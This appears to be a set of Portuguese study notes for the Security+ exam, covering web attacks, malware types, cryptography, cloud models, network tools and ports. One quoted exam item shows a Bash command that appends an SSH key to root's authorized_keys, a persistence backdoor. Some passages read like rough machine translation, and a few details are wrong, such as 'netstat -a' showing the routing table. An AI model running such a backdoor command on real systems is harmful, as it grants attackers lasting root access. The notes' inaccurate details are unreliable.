Prévia do material em texto
Threats, vulnerabilities:
SSRF: Server-Side Request Forgery: Vulnerabilidade que permite que o servidor interaja com recursos internos/ externos.ex: ao invés do arquivo de imagem de perfil, foi inserido um input com o caminho de um arquivo de senhas, que o servidor irá ler e devolver o arquivo.
A falsificação de solicitação entre sites (XSRF ou CSRF) aproveita os cookies e a URL parâmetros que sites legítimos usam para ajudar a rastrear e atender seus visitantes. Em um XSRF ou um CSRF ataque, os invasores aproveitam os direitos dos usuários autorizados e autenticados, fornecendo-lhes um cookie ou dados de sessão que serão lidos e processados quando visitarem o site de destino. O invasor pode incorporar um link em um email ou outro local que será clicado ou executado pelo usuário ou um processo automatizado a sessão desse usuário já aberta. Isso não é SQL injection, que tentaria enviar comandos para um banco de dados, ou injeção LDAP, que Coleta dados de um servidor de diretório. O script entre sites (XSS) incorporaria código em campos de dados usersubmittable que um site exibirá para outros usuários, fazendo com que ele seja executado.
Cross-site request forgery (XSRF ou CSRF) : envia solicitações falsas para um site que pretende ser de um usuário confiável e autenticado.
O cross-site scripting (XSS) explora a confiança do usuário tem para o site e incorpora scripts nesse site.
Shimming: o invasor coloca algum malware entre um aplicativo e outro arquivo e intercepta a comunicação com esse arquivo (geralmente com uma biblioteca ou API do sistema). Em muitos casos, isso é feito com um driver para um componente de hardware.
Uma ameaça persistente avançada (APT) envolve ataques sofisticados (ou seja, avançados) sobre um período de tempo (ou seja, persistente).
Uma colisão ocorre quando duas entradas diferentes produzem o mesmo hash.
Uma raibow table é uma mesa de hashes pré-computados.
Spyware e adware são exemplos comuns, PPIs ou programas potencialmente indesejados. Embora não sejam diretamente maliciosos, eles podem representar riscos à privacidade do usuário, bem como criar aborrecimentos como pop-ups ou outros comportamentos indesejados.
Os cavalos de Tróia parecem ser programas legítimos ou são emparelhados com eles, os RATs fornecem acesso remoto e são uma subcategoria de cavalos de Tróia,
ransomware exige pagamento ou outras ações para evitar danos aos arquivos ou à reputação.
Uma condição de corrida pode ocorrer quando vários threads em um aplicativo estão usando o mesmo variável e a situação não é tratada adequadamente.
. O servidor Postgres é configurado usando uma senha fraca para o usuário postgres, o Logon administrativo para o banco de dados. Esta é uma forma de administrativo ou raiz não segura conta. Curiosamente, essa não é uma configuração padrão, já que o Postgres não usa nenhuma senha por padrão para a conta Postgres — uma configuração ainda pior do que usar postgres como senha.
Elicitação, ou o processo de obter informações através da conversação para reunir informações úteis .A informação, é uma ferramenta chave no arsenal de engenharia social de um testador de penetração.
Pretexting envolve o uso de razões críveis para que o alvo concorde com o que a engenharia social está tentando fazer.
A melhor maneira de Scott determinar onde as redes sem fio de uma organização podem estar usar técnicas de war driving, war flying, and/or war walking para mapear a pegada de sinal sem fio da organização.
Um vírus de macro é um script mal-intencionado (macro) incorporado em um arquivo, normalmente um Microsoft Arquivo do Office. Eles geralmente são escritos no script VBA (Visual Basic for Applications).
Em uma injeção de DLL, o malware tenta injetar código no processo de alguma biblioteca. Este é um ataque bastante avançado
Os atores estatais (ou atores do Estado-nação) geralmente têm mais recursos e habilidades, tornando-os uma ameaça mais significativa e muito mais provável de ser associada a uma persistência avançada ator de ameaça.
Uma varredura intrusiva tenta explorar ativamente vulnerabilidades e, portanto, poderia causar alguma interrupção das operações. Por esta razão, deve ser conduzido fora do normal horário comercial ou em um ambiente de teste, se for usado.
A. Pharming tenta redirecionar o tráfego destinado a um site legítimo para outro mal-intencionado local. Os invasores geralmente fazem isso alterando o arquivo de hosts locais ou explorando um Servidor DNS.
Prepending :Para este exame, pode significar uma de três coisas: adicionar uma expressão ou frase a um e-mail, linha de assunto ou cabeçalhos para proteger ou enganar os usuários. Eles também observam que ele pode ser usado quando adicionar dados como parte de um ataque, e que os engenheiros sociais podem "prepend" informações por inseri-lo na conversa para fazer com que os alvos pensem sobre as coisas que o atacante quer que eles pensem.
Pretexing é uma técnica de engenharia social onde os atacantes usam um motivo que se destina a ser crível para o alvo pelo que estão fazendo. A injeção de SQL é uma tentativa de adicionar código SQL a uma consulta da Web para obter acesso ou dados adicionais. A pré-pendente é usada para cobrir uma grande variedade de técnicas no esboço do exame Security+ que se concentram em adicionar informações ou dados a conteúdo existente.
Embora auditar algumas bibliotecas ou bibliotecas que são desenvolvidas sob medida para o código é comum, auditar todas as bibliotecas usadas no código é improvável, exceto em situações excepcionais.
A falsificação de solicitação entre sites (XSRF ou CSRF) envia solicitações forjadas para um site, supostamente de um usuário confiável. Cross-site scripting (XSS) é a injeção de scripts em um site para explorar os usuários. Um estouro de buffer tenta colocar mais dados em uma variável do que a variável pode segurar. Um cavalo de Tróia de acesso remoto (RAT) é um malware que dá ao invasor acesso ao sistema.
Um ataque de negação de serviço (DoS) pode ter como alvo um vazamento de memória. Se um invasor puder induzir o
Aplicativo Web para gerar o vazamento de memória e, eventualmente, o aplicativo Web consumirá toda a memória no servidor Web e o servidor Web falhará. Backdoors não são causados por vazamentos de memória. A injeção de SQL coloca o SQL malformado em caixas de texto. Um estouro de buffer tenta colocar mais dados em uma variável do que ela pode conter.
Se o acesso não for tratado corretamente, uma condição de tempo de verificação/tempo de uso pode existir onde A memória é verificada, alterada e, em seguida, usada. Vazamentos de memória ocorrem quando a memória é alocada mas não desalocada.
A comunicação de campo próximo (NFC) é suscetível a uma espionagem de invasor no sinal.
Os vírus sem arquivo geralmente aproveitam o PowerShell para executar ações depois de terem usou uma vulnerabilidade em um navegador ou plug-in de navegador para se injetar no sistema memória.
on-path (man-in-the-middle), no caminho (man-in-the-middle), o invasor está entre o cliente e o e, para qualquer extremidade, o invasor aparece como a outra extremidade legítima.
Colocar um valor inteiro maior em uma variável inteira menor é um estouro de inteiro.
Nathan discovers the following code in the directory of a compromised user. What language is it using, and what will it do? echo "ssh-rsa ABBAB4KAE9sdafAK...Mq/jc5YLfnAnbFDRABMhuWzaWUp root@localhost" >> /root/.ssh/authorized_keys
D. Bash, adds an authorized SSH key
Os rootkits fornecem acesso administrativo aos sistemas, portanto, a "raiz" no rootkit.
C. Vazamentos de memória podem causar falhas, resultando em uma interrupção. Isso visa a disponibilidade perna da tríade CIA (confidencialidade, integridade e disponibilidade), tornando-se uma questão de segurança. Vazamentos de memória não vazam para outros locais, nem permitem a injeção de código. Em vez disso, vazamentos de memória causam exaustão de memória ou outros problemas ao longo do tempo, pois a memória não é devidamente recuperado.
Essa pergunta combina dois conhecimentos:é um dispositivo de baixo consumo de energia e chave pública A criptografia pode ser imp ser implementado em uma ampla gama de CPUs e sistemas embarcados, portanto, é improvável que a fatoração de números primos seja um problema
Um armário seguro ou cofre é inviolável e fornece um bom lugar para armazenar qualquer coisa que você estão tentando proteger fisicamente. Criptografar pen drives exigiria que você armazenasse a chave usado para criptografar o pen drive, continuando assim o problema. Na verdade, é uma boa prática para armazenar chaves BitLocker em mídia removível, desde que a mídia esteja protegida. Na maioria As gavetas de mesa não são seguras e podem ser facilmente arrombadas, mesmo que estejam trancadas.
Os códigos estáticos são normalmente gravados em um local seguro, mas se não estiverem corretamente Protegidos ou expostos de outra forma, eles podem ser roubados. As tentativas de força bruta devem ser detectado e prevenido por algoritmos de recuo e outras técnicas que previnem ataques contra sistemas de autenticação multifator. Existem colisões com algoritmos de hash, não com códigos multifator estáticos e problemas de incompatibilidade de relógio ocorrem para códigos TOTP (senha de uso único) baseados em tempo.
Um sistema de criptografia simétrico normalmente terá um desempenho mais rápido e com menos sobrecarga do processador e, portanto, menor latência do que os criptossistemas assimétricos. Hashing não é criptografia, e onetime pads não são implementados em sistemas criptográficos modernos, embora possam ter usos em futuras soluções criptográficas quânticas.
A falha na liberação da memória alocada pode levar a um vazamento de memória. Portanto, se você está usando uma linguagem de programação como C++ que permite alocar memória, fazer certo de que você desalocar essa memória assim que terminar de usá-la. Alocando apenas o tamanho de variável necessário e declarar variáveis onde necessário são boas práticas de programação. No entanto, deixar de segui-los apenas leva ao desperdício de memória; não conduz a um problema de segurança como um vazamento de memória.
Usar uma chave mais longa é a melhor maneira de tornar menos provável que um arquivo criptografado seja rachado. Isso não evita problemas com o algoritmo em si, mas se uma vulnerabilidade não for encontrado em um algoritmo, adicionar o comprimento da chave ajudará a garantir que até mesmo aumentos significativos no poder computacional não resultará na quebra da criptografia em um razoável período de tempo.
As chaves de criptografia usadas para distribuição de chaves quânticas são enviadas na forma de qubits. O O estado de polarização dos qubits reflete os valores de bit da chave. Uma vez enviado, o destinatário pode Valide o estado de alguns desses qubits para garantir que o emissor e o receptor tenham o mesmo chave. Bytes e bits são usados em trocas de dados tradicionais,
No modelo de plataforma como serviço (PaaS), o consumidor tem acesso à infraestrutura para criar aplicativos e hospedá-los. Software como serviço (SaaS) fornece um aplicação; A infraestrutura como serviço (IaaS) não fornece diretamente a capacidade de criar aplicações, embora essa distinção esteja rapidamente se borrando; e IDaaS é identidade como serviço.
Evitar a reutilização dos principais componentes de um processo de criptografia significa que, mesmo que um
Agente malicioso conseguiu quebrar a criptografia de uma mensagem ou troca, o próximo novo o vetor de inicialização (IV) e a chave exigiriam um ataque de força bruta inteiramente novo. Usando um novo IV e chave não torna os ataques de força bruta impossíveis, nem torna a força bruta Fácil. Um único ataque bem-sucedido exporia uma única mensagem, ou a quantidade de dados criptografado usando esse IV e chave.
O kernel Linux usa eventos orientados pelo usuário, como pressionamentos de teclas, movimento do mouse e similares eventos para gerar aleatoriedade (entropia). A hora do dia não é aleatória, os logins de usuários são normalmente não é frequente o suficiente ou aleatório o suficiente para ser uma fonte útil de entropia, e o tempo do pacote de rede não é usado para isso. Se você encontrar uma pergunta como esta e não Saiba por onde começar, considere o que você sabe sobre entropia – é aleatoriedade, então você estaria procurando o insumo que teria maisaleatoriedade a ele. Assim, você poderia Descartar a hora do dia e os prováveis logins de usuários. Depois disso, você pode considerar o que poderia ser controlado por uma parte externa: pacotes de rede sendo enviados para o sistema, e descartar isso como um potencial vetor de ataque. Isso deixa a entrada do teclado e o movimento do mouse.
Esquemas de criptografia de curva elíptica permitem o uso de uma chave mais curta para a mesma força que uma chave RSA exigiria, reduzindo a sobrecarga computacional necessária para criptografar e descriptografar dados. Isso não significa que você deva usar uma tecla curta; em vez disso, você deve selecionar um comprimento de chave que corresponda aos seus requisitos de resistência à força bruta e outros ataques. Hashing é irreversível e não é uma forma de criptografia
A iluminação serve como um controle dissuasor, fazendo com que possíveis agentes mal-intencionados sintam que podem ser observado sem áreas escuras ou sombras para se esconder. Ele não detecta ações, não compensar a falta de outro controle, e embora algumas luzes possam acender por movimento, o objetivo principal é impedir ações maliciosas ou indesejadas.
. A edge computing coloca o armazenamento de dados e o poder computacional mais perto de onde é necessário economizar largura de banda e melhorar a resposta dos aplicativos associados e serviços. A computação híbrida combina computação local e em nuvem. Compilações de nuvem local infraestrutura de nuvem em sistemas locais. A computação em névoa foi criada para esta questão, mas pode soar semelhante a fog computing, um termo que tem um significado semelhante ao edge computing, que usa computação e armazenamento local que é então conectado à Internet
Ben implantou um esquema de tokenização. A criptografia exigiria que os dados fossem descriptografado para ser usado, e isso não é mencionado. O hash pode ser usado para ocultar valores mas não preserva a capacidade de trabalhar com os dados. O mascaramento modifica o conteúdo para ocultar informações de identificação pessoal ou outras informações confidenciais.
A cerca é um impedimento útil porque desencoraja atores mal-intencionados de acessar os motivos que Dana deseja proteger. É também um exemplo de controle físico. Um visitante log é um controle administrativo e não impedirá atores mal-intencionados. Detectores de movimento e câmeras são exemplos de controles de detetive.
Um gerador é a resposta mais apropriada para uma interrupção de várias horas. Embora seja um site quente permitiria que sua organização permanecesse online, o custo de um hotsite é muito maior do que de um gerador. Uma PDU, ou unidade de distribuição de energia, é usada para gerenciar e distribuir energia, para não lidar com quedas de energia. Finalmente, os sistemas UPS normalmente não são projetados para lidar com longos períodos de tempo. interrupções. Em vez disso, condicionam a energia e garantem que os sistemas permanecem online o tempo suficiente para um gerador assumir o fornecimento de energia
Os sistemas de gás inerte são usados para reduzir o oxigênio em uma sala sem perigo para o pessoal que os sistemas de dióxido de carbono utilizam. Tanto os sistemas de tubulação seca quanto os de pré-carga utilizam água, que pode danificar componentes eletrônicos delicados.
Embora as ameaças reais de drones e veículos aéreos não tripulados (UAVs) sejam relativamente raro para a maioria das organizações, colocar áreas sensíveis mais dentro de um edifício impedirá a maioria gerações atuais de drones entrem ou gravem neles. Portas de segurança e outros obstáculos comuns impedirão a maior parte da penetração de UAV ou drones que organizações típicas Vai encarar. As cercas são facilmentecontornadas por drones voadores, sensores biométricos não param um drone de pairar fora de uma janela, e as gaiolas de Faraday podem impedir um drone de receber comandos se você conseguir colocar o drone dentro primeiro!
Criptografar a mensagem garantirá que ela permaneça confidencial enquanto apenas o o destinatário é capaz de descriptografá-lo. Hashing a mensagem fará com que a mensagem não seja recuperável, enquanto assiná-lo digitalmente pode fornecer não-repúdio. Finalmente, quântico algoritmos de criptografia e os sistemas necessários para usá-los não estão disponíveis hoje, o que significa que Amanda não poderá usá-los – ainda.
A distribuição de cabos protegidos utiliza controles elétricos, eletromagnéticos e até mesmo sensores acústicos ou de pressão de ar para garantir que os cabos e a infraestrutura de distribuição não sejam acessado, permitindo que informações confidenciais sejam transmitidas de forma não criptografada. Os EUA. o governo identifica três opções: portador endurecido, portador alarmado e continuamente vistos sistemas de distribuição protegidos. Cabos blindados são usados para evitar EMI.
Maureen está usando o conceito de esteganografia de áudio, ocultando dados dentro de um arquivo de áudio de uma forma que o esconda da detecção
O mascaramento modifica o conteúdo para ocultar informações de identificação pessoal (PII) ou outras informação sensível. A tokenização substitui informações confidenciais por informações não confidenciais alternativa que permite que os dados ainda sejam processados de maneira útil. A criptografia seria exigem que os dados sejam descriptografados para serem usados, e isso não é mencionado. Hashing pode ser usado para ocultar valores, mas não preserva a capacidade de trabalhar com os dados.
A computação em nuvem local costuma ser chamada de nuvem privada. Nem todas as nuvens privadas têm estar no local, porque as nuvens privadas podem ser implantadas em um local remoto, como uma instalação de hospedagem de terceiros. Infraestrutura como serviço e plataforma como serviço referem-se a serviços de hospedagem de terceiros, e a nuvem híbrida combina computação local e em nuvem modelos
Diversidade de controle significa utilizar controles diferentes para mitigar a mesma ameaça. Para malware, o uso de controles técnicos, como antimalware, é fundamental. Mas também é importante ter controles administrativos, como boas políticas, e garantir que os funcionários sejam devidamente treinado. Assim, para esta questão, uma combinação de políticas, formação e ferramentas é a solução. melhor resposta.
Embora possa parecer que Charles apresentou dois fatores, na verdade ele apresentou apenas dois tipos de coisas que conhece junto com sua identidade. Para realmente implementar um ambiente multifatorial, ele deve usar mais de algo que você tem, algo que você sabe, e algo que você é.
É fundamental autenticar os usuários da API e depois autorizá-los a realizar ações. Se você autorizados primeiro e depois autenticados, os usuários poderiam agir antes que você soubesse quem eles eram! A criptografia durante todo o uso da API mantém os dados e as consultas seguras, validando inserir e filtrar strings perigosas é importante para evitar injeção e outros ataques, e auditoria e registro permitem solucionar problemas e responder a problemas e ataques
Chris está preocupado com o aumento de privilégios, o lento acúmulo de privilégios ao longo do tempo à medida que os membros da equipe mudam de função e seus privilégios não são removidos ou atualizados. Privilégio os processos de gestão ajudariam a evitar esta situação, mantendo assim os dados mais seguros. Do outras opções, apenas escalonamento de privilégios é um termo comum e significa ganhar adicional privilégios, normalmente como parte de um ataque de uma conta com menos privilégios para uma conta mais conta privilegiada como administrador ou conta root
Embora não exista uma distância específica recomendada, as recomendações normalmente variam de 60 a 120 milhas de distância para garantir que é improvável que um único desastre desative ambos os locais.
.Fog computing é um termo cunhado pela Cisco para descrever a computação em nuvem no limite do uma rede empresarial. O termo mais comum para isso é edge computing, mas você pode encontrar ambos os termos. As implementações do Fog lidam com quantidades significativas de computação, atividades de comunicação e armazenamento localmente, ao mesmo tempo que se conecta a serviços em nuvem para realizar parte do trabalho.
Bcrypt, scrypt e PBKDF2 são exemplos de algoritmos de alongamento de chave. MD5 e SHA1 são algoritmos de hash
Implementation
Tracert: comando de rede no MS Windows que rastreia e exibe a rota seguida pelos pacotes IPv4 em seu caminho para outro host.
Traceroute: comando do Linux para exibir pontos intermediários (roteadores) pelos quais o pacote IPv4 é passado a caminho de outro nó da rede.
Dig e Nslookup: linha de comando de administração de rede usados para consultas DNS
Ipconfig: comando do Windows que pode ser usado para exibir definições de configuração TCP/IP
Ifconfig: comando do Linux para configuração da interface de rede
Nmap: ferramentas de linha de comando é usada para descobrir hosts e serviços em uma rede
Ping: comando usado para verificar a acessibilidade de um host de rede remoto.
Pathping : comando de rede no MS Windows combina os recursos de ping e tracert
Hping: ferramenta de linha de comando usada para auditoria de segurança e testes de firewalls e redes
Netstat: Exibir conexões TCP/IP ativas
Exibir estatísticas de protocolo de rede
Netcat: refere a uma ferramenta de depuração e exploração de rede que pode ler e gravar dados em conexões TCP ou UDP.
netstat -a : comando do Linux para exibir o conteúdo da tabela de roteamento.
Harvester : ferramentas é usada para coletar OSINT
Sn1per: ferramenta avançada de exploração de rede e teste de penetração que integra funcionalidades de várias outras ferramentas, como ping, whois ou nmap.
Scanless: Ferramentas oculta a identidade do invasor utilizando um proxy para verificação de portas
Tcpreplay : ferramenta de criação de pacotes de interface de linha de comando (CLI)
Lista de protocolos e suas portas
Serviço
TCP
UDP
Observações
FTP
21
21
Transferência de arquivos
SSH
22
22
Protocolo de login remoto encriptado
Telnet
23
23
Protocolo de login remoto
SMTP
25
25
Para envio de email
DNS
53
53
Resolução de nomes para IP
HTTP
80
80
Para web browser
POP3
110
110
Para recepção de email
IMAP
143
143
Para recepção/envio de email
TLS/SSL
443
443
Protocolo de camada de sockets segura
IRC
6667
6667
Para conversação/chat
Pichat
9009
9009
Protocolo de conversação/chat
FTPS
PORTAS 989 e 990
HTTPS PORTA TCP 443
SMTPS PORTA TCP 465
NTP PORTA UDP 123 Sincronização de tempo entre cliente e servidor.
SECURE POP3 PORTA TCP 995.
SECURE IMAP PORTA TCP 993.
LDAPS PORTA TCP 636 Serviço de diretório.
LDAP PORTA TCP 389
RDP PORTA 3389 Acesso remoto Windows
SNMP: 161 e 162. udp
· FTP sobre SSL/TLS (FTPS): Utiliza o protocolo FTP tradicional com extensões de segurança SSL/TLS. Requer uma porta específica (geralmente a porta 990) para conexões SSL/TLS.
· SSH File Transfer Protocol (SFTP): Utiliza o protocolo SSH para transferência de arquivos. Funciona na porta padrão do SSH (porta 22) e utiliza criptografia SSH para segurança.
Comando Linux
O cat (abreviação para concatenar) é um dos comandos Linux mais usados. Ele é usado para visualizar, criar e relacionar arquivos. Para executar esse comando, digite cat seguido pelo nome do arquivo e sua extensão. Por exemplo: cat nomedoarquivo.txt.
cat > nomedoarquivo.txt cria um novo arquivo
cat nomedoarquivo1.txt nomedoarquivo2.txt > nomedoarquivo3.txt junta dois arquivos (1 e 2) em um novo (3).
tac nomedoarquivo.txt exibe o conteúdo do arquivo em ordem reversa
Use o comando cp para copiar arquivos ou diretórios e seu conteúdo. Abaixo, listamos algunsexemplos.
A autenticação baseada em conhecimento requer informações que somente o usuário provavelmente saberá. Exemplos incluem coisas como pagamentos de impostos anteriores, valores de contas e informações semelhantes.
Uma VPN TLS (Transport Layer Security) é frequentemente escolhida quando a facilidade de uso é importante, e os aplicativos Web são o principal modo de uso.
VPNs IPSec são usadas para VPNs site a site e para fins em que outros protocolos podem ser necessários, porque eles fazem o ponto final O sistema parece estar na rede remota.
A criptografia de disco completo (FDE) criptografa totalmente o disco rígido em um computador. Este é um método eficaz para garantir a segurança dos dados em um computador.
Módulos de plataforma confiáveis (TPMs) são chaves de armazenamento e são usadas para integridade de inicialização e outras necessidades criptográficas e não protegerá diretamente os dados.
A rede definida por software (SDN) é uma rede virtualizada e as zonas desmilitarizadas (DMZs) são usadas para segmentar uma rede e não afetarão esse problema.
Uma DMZ (zona desmilitarizada) fornece acesso limitado a servidores voltados para o público para fora usuários, mas impede que usuários externos acessem sistemas dentro da LAN. É uma prática comum colocar servidores web na DMZ.
Uma LAN virtual, ou VLAN, é mais frequentemente usada para segmentar a rede interna, roteadores direcionar o tráfego com base no endereço IP e
uma rede convidada permite que usuários internos que não são funcionários tenham acesso à Internet.
O CN, ou nome comum, para um certificado para um sistema é normalmente o totalmente qualificado nome de domínio (FQDN) para o servidor. Se Megan estava solicitando um certificado para si mesma, em vez de para um servidor, ela usaria seu nome completo.
Os mapas de calor de rede sem fio são usados para mostrar quão fortes são os sinais de rede sem fio em todo um edifício ou local.
WPA3 suporta SAE, ou autenticação simultânea de iguais, proporcionando uma maneira de autenticar que limita o potencial de ataques de força bruta e permite que os indivíduos para usar senhas diferentes. WPA não é tão seguro quanto WPA2, e WEP é o mais antigo, e menos protocolo de segurança seguro e sem fio.
Não renovação de certificado: Embora a confiança no site provavelmente seja reduzida porque os usuários receberão avisos, o os recursos de criptografia subjacentes reais não serão alterados.
Os TPMs (Trusted Platform Modules) fornecem um gerador de números aleatórios, a capacidade de gerar chaves criptográficas, suporte para atestado remoto como parte do processo de inicialização, como bem como capacidades de ligação e vedação.
O hashing é comumente usado em bancos de dados para aumentar a velocidade de indexação e recuperação uma vez que normalmente é mais rápido procurar uma chave hash em vez do valor original armazenado em um base de dados. O hash não é uma forma de criptografia, o que significa que ele não é usado para criptografar armazenados dados. O hash não é usado para ofuscar dados ou substituir dados confidenciais.
A resposta correta é permitir que apenas componentes assinados sejam carregados no navegador. Código a assinatura verifica o originador do componente (como um componente ActiveX) e, portanto, torna o malware muito menos provável. Embora o antimalware baseado em host seja uma boa ideia, ele não é o melhor remédio para esta ameaça específica. As listas negras não podem abranger todos os sites infectados, apenas o sites que você conhece.
Zarmeena implementou um método de autenticação de chave pré-compartilhada, ou PSK. Isso significa que se ela precisar trocar a chave porque um funcionário sai, ela vai precisar ter todos dispositivo atualizar sua senha. Para implantações maiores, a autenticação corporativa pode se conectar para um serviço de autenticação e autorização, permitindo que cada usuário se autentique como ele mesmo.
O EAP-FAST foi projetado especificamente para organizações que desejam concluir rapidamente as reconexões e não exigem que os certificados sejam instalados no dispositivo de ponto de extremidade. EAP Tunneled Transport Layer Security (EAP-TTLS) requer certificados do lado do cliente; EAP-TLS requer autenticação mútua, que pode ser mais lenta; e o PEAP (Protected Extensible Authentication Protocol) é semelhante ao EAP-TTLS.
A resposta correta é implementar uma infraestrutura de área de trabalho virtual (VDI). Se todos os desktops forem virtualizados, a partir de um único local central, você poderá gerenciar patches, configuração e instalação de software.
Uma VPN baseada em TLS (geralmente chamada de VPN baseada em SSL, apesar de o SSL estar fora de moda) fornece a maneira mais fácil para os usuários usarem VPN, uma vez que não requer um cliente. VPNs SSL também funcionam apenas para aplicações específicas, em vez de fazer um sistema parecer que está totalmente em um rede remota. HTML5 não é uma tecnologia VPN, mas alguns portais VPN podem ser criados usando HTML5. Security Assertion Markup Language (SAML) não é uma tecnologia VPN. IPSec VPNs exigem um cliente ou configuração e, e, portanto, são mais difíceis de usar para os usuários finais na maioria dos casos;
Embora os módulos de segurança de hardware (HSMs) forneçam muitas funções criptográficas, eles não são usados para atestado de inicialização. Um TPM, ou Trusted Platform Module, é usado para atestado de inicialização.
Cynthia deve implantar cartões de identificação de radiofrequência (RFID), que podem ser lidos usando leitores sem contato. A tecnologia RFID é comum e relativamente barata, mas sem autenticação adicional, posse de um cartão é o único meio de determinar se alguém é autorizado a acessar um prédio ou sala.
A resposta correta é primeiro testar os patches. É sempre possível que um patch possa causar problemas para um ou mais aplicativos atuais. Esta é particularmente uma preocupação com as aplicações que têm muita interação com o sistema operacional host. Um patch do sistema operacional pode impedir que o aplicativo seja executado corretamente. Mas assim que os patches são testados, Uma implantação gradual para a empresa deve começar.
A resposta correta é desligar qualquer acesso remoto a esses dispositivos que não seja absolutamente Necessário. Muitos dispositivos periféricos vêm com SSH (Secure Shell), Telnet ou serviços semelhantes. Se você não está usando-os, desligue-os. Muitos periféricos não têm discos para criptografar, tornando criptografia de disco completo (FDE) uma opção menos útil.
Samantha deve colocar sua chave SSH pública no diretório .ssh em seu diretório pessoal no servidor remoto. As chaves privadas nunca devem estar fora do seu controle e, ao contrário de muitos Configurações Linux, chaves SSH não são mantidas no diretório /etc/.
A resposta correta é usar análise estática de código. Vazamentos de memória geralmente são causados por falha ao desalocar a memória que foi alocada. Um analisador de código estático pode verificar se Veja se todos os comandos de alocação de memória (malloc, alloc, etc.) têm um comando de desalocação correspondente. Fuzzing envolve a inserção de dados que estão fora dos valores esperados para ver como o aplicativo lida com isso. O teste de estresse envolve testar como um sistema lida com cargas de trabalho extremas. A normalização é uma técnica para desduplicação.
Os balanceadores de carga fornecem um IP virtual, ou VIP. O tráfego enviado para o VIP é direcionado para os servidores no pool com base no esquema de balanceamento de carga que esse pool está usando — geralmente um round-robin esquema, mas outras versões que incluem ordem de prioridade e controle de capacidade ou classificações são também comum. O endereço IP do balanceador de carga é normalmente usado para administrar o sistema, e endereços IP individuais para os hosts clusterizados são protegidos pelo balanceador de carga para evitar tráfego de ir consistentemente para indo para esses hosts, criando assim uma falha ou ponto de carga.
A resposta correta é usar Secure Shell (SSH).Este protocolo é criptografado. SSH também Autentica o usuário com criptografia de chave pública. O Telnet é inseguro e não criptografa dados. O RSH, ou Shell Remoto, envia pelo menos alguns dados não criptografados e também é inseguro. SNMP, ou Simple Network Management Protocol, é usado para gerenciar uma rede e não é usado para comunicações remotas.
. As políticas baseadas em recursos são anexadas aos recursos e determinam quem tem acesso a um como um grupo de administradores de sistemas ou desenvolvedores e em quais ações eles podem executar o recurso. Os serviços em nuvem têm termos diferentes para monitorar seu uso de recursos; estes Os termos podem variar de serviço para serviço.
As redes sem fio ad hoc operam em uma topologia ponto a ponto. Modo de infraestrutura Os pontos de acesso funcionam em uma topologia ponto a multiponto. Modelos de estrela e ônibus são usados em redes cabeadas.
Somente o uso de código assinado digitalmente verifica o criador do software. Por exemplo se um driver de impressora/dispositivo multifuncional (MFD) estiver assinado digitalmente, isso lhe dará confiança que ele realmente é um driver de impressora do fornecedor que pretende ser, e não malware disfarçado de driver de impressora. O software assinado dá-lhe um elevado grau de confiança de que não é malware, mas não fornece uma garantia. Por exemplo, o infame vírus Flame foi assinado com um Micro comprometido.
Filtros de segurança de porta por endereço MAC, permitindo que endereços MAC permitidos se conectem a porta e os endereços MAC bloqueados na lista negra. A segurança da porta pode ser estática, usando uma lista predeterminada ou permitindo dinamicamente que um número específico de endereços se conecte, ou pode ser executar em um modo de combinação de modos estático e dinâmico.
Os AHs (cabeçalhos de autenticação) fornecem integridade completa do pacote, autenticando o pacote e o cabeçalho. Os cabeçalhos de autenticação não fornecem nenhuma criptografia, e os cabeçalhos de autenticação autenticam o pacote inteiro, não apenas o cabeçalho.
Uma implementação de DNS de horizonte dividido implanta servidores DNS distintos para dois ou mais ambientes, garantindo que esses ambientes recebam informações de DNS apropriadas para o Exibição DNS que seus clientes devem receber.
Network taps copiam todo o tráfego para outro destino, permitindo a visibilidade do tráfego sem um dispositivo em linha. Eles são métodos completamente passivos de obter tráfego de rede para uma central localização.
A federação RADIUS permite que as organizações permitam que usuários de outras organizações parceiras se autentiquem em seus sistemas domésticos e, em seguida, sejam autorizados na rede da organização local. Um exemplo disso é a federação eduroam usada pelo ensino superior instituições para permitir que alunos, professores e funcionários usem redes universitárias em qualquer lugar que vão onde o eduroam está no lugar.
A autenticação sensível ao contexto pode levar em conta informações como geolocalização para Certifique-se de que os dispositivos só possam ser conectados quando estiverem dentro dos limites da instalação. Isso significa que os dispositivos só serão úteis no local e podem ajudar a proteger os dados e aplicativos nos dispositivos
A troca de chaves da Internet (IKE) é usada para configurar associações de segurança (SAs) em cada extremidade do o túnel. As associações de segurança têm todas as configurações (ou seja, algoritmos criptográficos, hashes) para o túnel. A IKE não está diretamente envolvida na criptografia ou autenticação. IKE em si não estabelece o túnel — estabelece as SAs.
A tokenização é usada para proteger dados, substituindo tokens por dados confidenciais sem alterando o comprimento ou o tipo de dados. Isso permite que os bancos de dados manipulem os dados da mesma maneira como era antes da tokenização, garantindo que o software existente não terá problemas devido aos dados que estão sendo alterados. A criptografia fornece proteção semelhante, mas normalmente Altere o comprimento dos dados, o tipo de dados ou ambos.
Fuzzing é uma técnica de teste de software automatizada e dinâmica que envia muitas vezes dados inválidos para um programa para testar como ele responde. O software é monitorado para ver como ele responde à entrada, fornecendo garantia adicional de que o programa tem tratamento de erros e validação de entrada incorporada.Timeboxing é um gerenciamento ágil de projetos técnica;
A espionagem do protocolo DHCP (Dynamic Host Configuration Protocol) pode ser configurada em switches para monitorar e interromper o tráfego DHCP não autorizado de servidores desconhecidos. Desabilitar a espionagem DHCP removeria esse recurso. Os sistemas de detecção de intrusão (IDSs) não podem parar o tráfego, e bloquear o tráfego DHCP impediria que os sistemas adquirissem endereços IP dinâmicos.
A detecção e resposta de endpoints (EDR) concentra-se na identificação de anomalias e problemas, mas Ele não foi projetado para ser uma ferramenta de análise de malware. Em vez disso, a capacidade de pesquisar e explorar dados, identificar atividades suspeitas e coordenar respostas é o que compõe uma ferramenta EDR.
Um proxy da Web pode ser usado para bloquear determinados sites. É prática comum para rede administradores para bloquear sites individuais ou classes gerais de sites (como procura de emprego sítios). A conversão de endereços de rede (NAT) é usada para traduzir os endereços IP privados de computadores internos para endereços IP públicos. Um firewall de filtro de pacotes pode bloquear o tráfego em um determinada porta ou endereço IP ou usando um protocolo específico, mas geralmente eles não são capazes de Bloqueie sites específicos. Int baseado em rede.
Os serviços de gerenciamento de segredos fornecem a capacidade de armazenar dados confidenciais, como aplicativos chaves de interface de programação (API), senhas e certificados. Eles também fornecem a capacidade para gerenciar, recuperar e auditar esses segredos. Uma infraestrutura de chave pública (PKI) se concentraria em certificados e chaves de criptografia, sem senhas ou chaves de API. Uma plataforma confiável O módulo (TPM) está associado ao hardware, e um serviço de silêncio foi criado para isso pergunta.
